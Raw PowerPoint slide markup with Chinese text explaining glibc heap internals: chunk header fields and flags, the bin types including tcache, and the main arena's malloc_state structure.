                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A8C7AA2-FF54-46B6-9231-D18692EE4843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7965614" y="4318001"/>
            <a:ext cx="324946" cy="136395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15CACFF8-4006-4D73-899D-F81E3E8B69CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4833150" y="2094681"/>
            <a:ext cx="40959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仅当前一个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02F6E7D-636C-4F74-8C01-1A9AA3014AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8323065" y="4815310"/>
            <a:ext cx="250414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13925DF-8456-40FD-B76F-3FE8F255706A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4803286" y="5204896"/>
            <a:ext cx="312604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large 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2" name="右大括号 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B359D0-0531-46FD-947B-5508CE86FCD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987040" y="4712814"/>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12FC9CF7-E5EF-435D-BDC5-65D503148105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3280282" y="4610916"/>
            <a:ext cx="484491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仅为处于双向链表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4" name="右大括号 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAEEFB01-E94F-4B54-88EC-40848BC5BD6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480560" y="3211420"/>
            <a:ext cx="324946" cy="93627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B28F74C-BEF0-4DA7-A89A-ED728E1A5332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4833150" y="3494178"/>
            <a:ext cx="22894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占据</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域的低</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3bits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18422358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422902" y="1564009"/>
            <a:ext cx="84670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bin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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882DD6-8AE5-459B-8AC4-DA3D8B7280FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2878584" y="2287297"/>
            <a:ext cx="7157731" cy="646331"/>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管理 arena 中空闲 chunk 的结构，以数组的形式存在，数组元素为相应大小的 chunk 链表的链表头，存在于 arena 的 malloc_state 中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E28EEC5-E142-441B-AB67-E3173C7F42EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870023" y="3429000"/>
            <a:ext cx="2451953" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">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unsorted bin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fast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small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large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(tcache)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CA7FB3B-4034-4BD6-932B-8C209A3D4A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173385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066207"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prev_size</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"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6E5CD911-EB0F-4F15-ADE1-2945AF501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152775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E57F36EF-3E58-4E3D-8BC9-DD96A1300718}"/>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若前一个物理相邻的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，则表示其大小。否则用于存储前一个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的数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17355030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95891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D2C6478-A061-4798-8A65-874B9BD7B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7465E100-D0E7-40A3-95CC-D79AFCF09B7B}"/>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占据一字长的低</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3bits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>以后的地址，用于表示当前</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的大小（整个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的大小，包括</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头）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231473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937216-F1D1-43AC-AAEC-4905C5B80376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325155" y="2143320"/>
            <a:ext cx="2339102" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>编码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E947F7CE-5660-4F2D-A56C-5B637257A7A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2176349" y="2723866"/>
            <a:ext cx="1510350"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1Byte = 8bits</a:t>
            </a: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30537596-D144-4E41-B3BC-07E8A80649C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365230" y="3442910"/>
            <a:ext cx="232146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常以</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进制表示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5623D9A4-3A80-4051-9CF5-105A9FE0A0BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1727508" y="4069621"/>
            <a:ext cx="1959191"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0x3c = 0011 1100 </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751F35E4-7815-42DE-89EB-5B5FBC82BBA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005627" y="2143320"/>
            <a:ext cx="349967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用户空间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>每个进程一份</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4B03993-748E-4B7D-A15C-01966D6DA706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005627" y="3107609"/>
            <a:ext cx="396134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内核空间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>所有进程共享一份</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9DD882E-986D-4479-BA94-48CEB1C81881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005627" y="4071898"/>
            <a:ext cx="6250429"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mmap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段中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>动态链接库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>仅在物理内存中装载一份</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0CA4A20-AD38-4B0E-8ED2-B0EA8F0D5E4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7434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41596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A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F4D882-555C-49DC-B8BC-1FEEFA07C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378608A8-B7DA-4174-913A-62A24A132EE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="3667760"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NON_MAIN_ARENA</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是否不属于主线程，</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表示不属于，</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表示属于。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="999388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52817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F59E60-D320-49FC-A8FC-9F9AC8CAC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9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54128C17-D399-4CCD-AAF5-BB5A8B0E230C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="366776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IS_MAPPED</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是否是由 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mmap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分配的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41175411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3758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P flag</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BEB312B-8CB1-4496-8BFE-1303AFFF7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5984AAA0-591F-475F-A31D-2AF5B66D9614}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="2454216"/>
            <a:ext cx="3667760" cy="286232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PREV_INUSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，记录前一个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块是否被分配。一般来说，堆中第一个被分配的内存块的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字段的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位都会被设置为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，以便于防止访问前面的非法内存。当一个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位为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时，我们能通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>prev_size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字段来获取上一个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的大小以及地址。这也方便进行空闲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之间的合并。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20221738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25876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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>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3171F35-116A-4A27-B60B-B414BA67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BE911DE9-12D4-4211-A642-E77398D7E20E}"/>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中指向下一个（非物理相邻）空闲的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5300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338910"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bk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8AF59CC-C7B3-4ACF-9399-8774E175B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6A0ADB66-7BC6-41BD-85A8-D195BB252BF0}"/>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中指向上一个（非物理相邻）空闲的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2347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49780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fd_nextsize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43660D-2294-4292-939E-93EA61CE2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C9F2BB01-EFD7-4981-92A6-E55036B43D6E}"/>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中指向前一个与当前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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3802601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57795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bk_nextsize</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5389CB7-7F5D-4268-82B5-733CE28BA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7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFBCE28-02B8-43DA-8E12-13C87AA28DEC}"/>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中指向后一个与当前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
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1BD9B44-6D6C-43A6-B8EA-53A46EBC9478}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="589280" y="6170686"/>
            <a:ext cx="11460480" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一般空闲的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>large chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的遍历顺序中，按照由大到小的顺序排列。这样做可以避免在寻找合适 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>挨个遍历</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839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B1C3A78D-0F5D-4103-9FE5-455AD0BD5122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588072" y="1202327"/>
            <a:ext cx="11015856" cy="5447645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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p>
          <a:p>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Serialize access.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795E26"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>libc_lock_define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mutex</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Flags (formerly in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>max_fast</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flags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Fastbins</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mfastbinptr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fastbinsY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[ NFASTBINS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Base of the topmost chunk -- not otherwise kept in a bin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top</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The remainder from the most recent split of a small request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last_remainder</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Normal bins packed as described above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bins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[ NBINS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Bitmap of bins, help to speed up the process of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>determinating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> if a given bin is definitely empty.*/</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unsigned</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binmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[ BINMAPSIZE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points to the next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next</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for free arenas.  Access to this field is serialized</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by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next_free</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Number of threads attached to this arena.  0 if the arena is on</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the free list.  Access to this field is serialized by</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attached_threads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Memory allocated from the system in this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max_system_mem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1C78366-619B-44FA-9510-545D5A34DDA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5042622" y="876500"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>main arena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>malloc_state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>并不是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>heap segment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>的一部分，而是一个全局变量，存储在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>libc.so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>的数据段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
